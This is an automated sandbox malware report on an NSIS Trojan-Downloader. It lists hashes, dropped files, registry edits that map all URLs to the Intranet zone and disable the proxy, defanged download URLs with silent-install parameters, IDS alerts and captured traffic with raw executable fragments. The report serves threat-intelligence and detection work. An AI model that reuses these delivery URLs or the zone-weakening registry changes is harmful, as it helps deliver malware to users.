Trojan.NSIS.StartPage_fcb477e99b

by malwarelabrobot on October 15th, 2016 in Malware Descriptions.

Trojan-Downloader.NSIS.Adload.bx (Kaspersky), Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: fcb477e99b254561fcfefde63a0bed65
SHA1: 8e76b28344b1650a1e68bd30a37683e2ba8fb233
SHA256: a204cd36c52d8bc91335643bdf6e84dcc98bb19c1170f05b4d0dcf1aadb19ce0
SSDeep: 393216:4msZRvpPz1D9XAoPuJfI6107g66n/f/gMOCLysGY2rPIC:ps7xL1DtAoGJn25SHgWysGY2bt
Size: 17285428 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Web
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:616
LggJBBE5vd.exe:1608
Setup__2140_il11.exe:1740

Mutexes

The following mutexes were created/opened:

ZonesLockedCacheCounterMutex
ZonesCounterMutex
ZonesCacheCounterMutex
RasPbFile
WininetProxyRegistryMutex
WininetConnectionMutex
WininetStartupMutex
c:!documents and settings!adm!local settings!history!history.ie5!
c:!documents and settings!adm!cookies!
c:!documents and settings!adm!local settings!temporary internet files!content.ie5!
_!MSFTHISTORY!_
ShimCacheMutex

File activity

The process %original file name%.exe:616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\launch_reb[1].htm (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\580019566fa41[1].exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\LggJBBE5vd.exe (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\6j6GOciRXw (178 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr1.tmp (0 bytes)

The process LggJBBE5vd.exe:1608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\Setup__2140_il11.exe (55260 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\NSISdl.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\nsArray.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp\635845710 (871 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp (0 bytes)

The process Setup__2140_il11.exe:1740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\logo[1].png (2150 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\accept[1].gif (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\dm_left_image[1].png (1928 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (29529 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\index[1].htm (7480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\finish[1].gif (2 bytes)

Registry activity

The process %original file name%.exe:616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 3E 47 04 3E E0 51 7D 5A 06 C1 41 06 F3 EC F9"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process LggJBBE5vd.exe:1608 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "57 E1 36 EA A8 AF 3C 87 D5 03 8E FD 50 45 8A 4C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process Setup__2140_il11.exe:1740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}]
"(Default)" = "Inst Class"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}]
"(Default)" = "IBoot"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\VersionIndependentProgID]
"(Default)" = "rakis.unblamed"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0]
"(Default)" = "InstallerLib"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\TypeLib]
"(Default)" = "{38d2a8d3-f52b-4d86-a7b8-d71a1d37ba91}"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\ProgID]
"(Default)" = "rakis.unblamed.1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCR\rakis.unblamed]
"(Default)" = "Inst Class"

[HKCR\rakis.unblamed.1]
"(Default)" = "Inst Class"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\TypeLib]
"(Default)" = "{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il11\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\Version]
"(Default)" = "1.0"

[HKCR\rakis.unblamed\CurVer]
"(Default)" = "rakis.unblamed.1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 69 3B 45 4E 80 7F EC 16 DF 4C 87 9E C5 74 FF"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1473856750"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\TypeLib\{38D2A8D3-F52B-4D86-A7B8-D71A1D37BA91}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp"

[HKCR\rakis.unblamed.1\CLSID]
"(Default)" = "{e59781dd-ffd9-4ede-8b1c-043817fa2e37}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\CLSID\{e59781dd-ffd9-4ede-8b1c-043817fa2e37}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsz5.tmp\Setup__2140_il11.exe"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{34A7E5E5-8E1F-4204-A840-DE7721F49FFB}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

The Trojan modifies IE security-zone settings so that all local web nodes with no dots that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il11\DEBUG]
"Trace Level"

Dropped PE files

MD5 File path
b736a969ac263de8e1a7a079945e0eda c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2.tmp\LggJBBE5vd.exe
c17103ae9072a06da581dec998343fc1 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2.tmp\System.dll
c498ae64b4971132bba676873978de1e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsm2.tmp\inetc.dll
7caaf58a526da33c24cbe122e7839693 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz5.tmp\NSISdl.dll
37363051edef355103aaff18c65a7745 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz5.tmp\Setup__2140_il11.exe
89d40ecddf3ce6f3b0e6a84f40936912 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsz5.tmp\nsArray.dll
b736a969ac263de8e1a7a079945e0eda c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\580019566fa41[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23628 24064 4.46394 856b32eb77dfd6fb67f21d6543272da5
.rdata 28672 4764 5120 3.4982 dc77f8a1e6985a4361c55642680ddb4f
.data 36864 154712 1024 3.3278 7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata 192512 40960 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 233472 11432 11776 1.94603 944e14399617ec3c5d6fddb92f5bd229

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://dna4mm5c1mahl.cloudfront.net/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic=
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://dyno3mlj15jgv.cloudfront.net/V38/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/1bb0b654-6d8e-40c5-b993-0a341b40c375/logo.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png 216.137.61.248
hxxp://get.enomenalco.club/launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic= 216.137.61.45
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif 216.137.61.248
hxxp://www.millesimalnonremuneration.site/Html/1bb0b654-6d8e-40c5-b993-0a341b40c375/logo.png 54.243.162.76
hxxp://www.millesimalnonremuneration.site/index.php 54.243.162.76
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif 216.137.61.248
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png 54.243.162.153
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif 216.137.61.248
hxxp://cdn2.leadingdownload.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png 216.137.61.248
hxxp://cdn1.leadingdownload.com/V38/amipb.js 216.137.61.109
hxxp://www.millesimalnonremuneration.site/finalize.php 54.243.162.76
pe-sixi.com 69.197.35.236


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE SoundCloud Downloader Install Beacon
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il11.exe"
Content-Type: application/x-msdownload
Date: Thu, 13 Oct 2016 23:31:56 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Thu, 13 Oct 2016 23:31:56 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il11.exe
Content-Length: 716800
Connection: Close
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.........<...R..
.R...R.u.....R..4....R.......R..4..Q.R.......R..4....R...R...R.......R
.......R...S...R..4....R..4....R..4....R.Rich..R......................
...PE..L....D.W.................b........................@............
[email protected]........
...HE......................<Z.. ...................................
@...............\............................text....`.......b........
.......... ..`.rdata...............f..............@[email protected]....[...@..
[email protected]..............@[email protected]
..>].......^[email protected].................................
......................................................................
......................................................................
......................................................................
...................................................... ..........3.9..
...V........D$.....^...j ..NF......3.9.tRj.h|.G..M..E......]..].......
]..}...E.s..E.SSS.6Ph..G..X...YY...6....F.Sj..M............3..H..H....
3....H..|.H..x.H..t.H....H..t.H..3.9..XH.t..=.XH....XH.s...XH..j..vTF.
......}.j.....G.X3.3..G.._.f.O..][email protected]....._
l3.f.G\........G......................................................
......................................_x._|................V........D$
..t.V.#>..Y..^...j..ETF......j....H.X3.3..}.....H...G....H.....

<<< skipped >>>

GET /launch_v5.php?p=sevenzip&pid=2273&tid=10277909&b_typ=pe&n=QWRndWFyZCBQcmVtaXVtIHY2LjEuMjQ1LjEyMTIg&reb=1&ic= HTTP/1.0
Host: get.enomenalco.club
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*


HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 871
Connection: close
Date: Thu, 13 Oct 2016 23:31:52 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
X-Cache: Miss from cloudfront
Via: 1.1 0164db6ca0f73af70bfd1b141e20277b.cloudfront.net (CloudFront)
X-Amz-Cf-Id: -_rfo0HGF52feuyFa0tk1v-voPAOs9aB0ExcnDeBWhSDXIOwCvoUfw==
files=4.t1=dl.u1=hXXp://VVV.dosecuretrips.com/download.php?version=1.1
.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/do
wnloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cm
dline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_
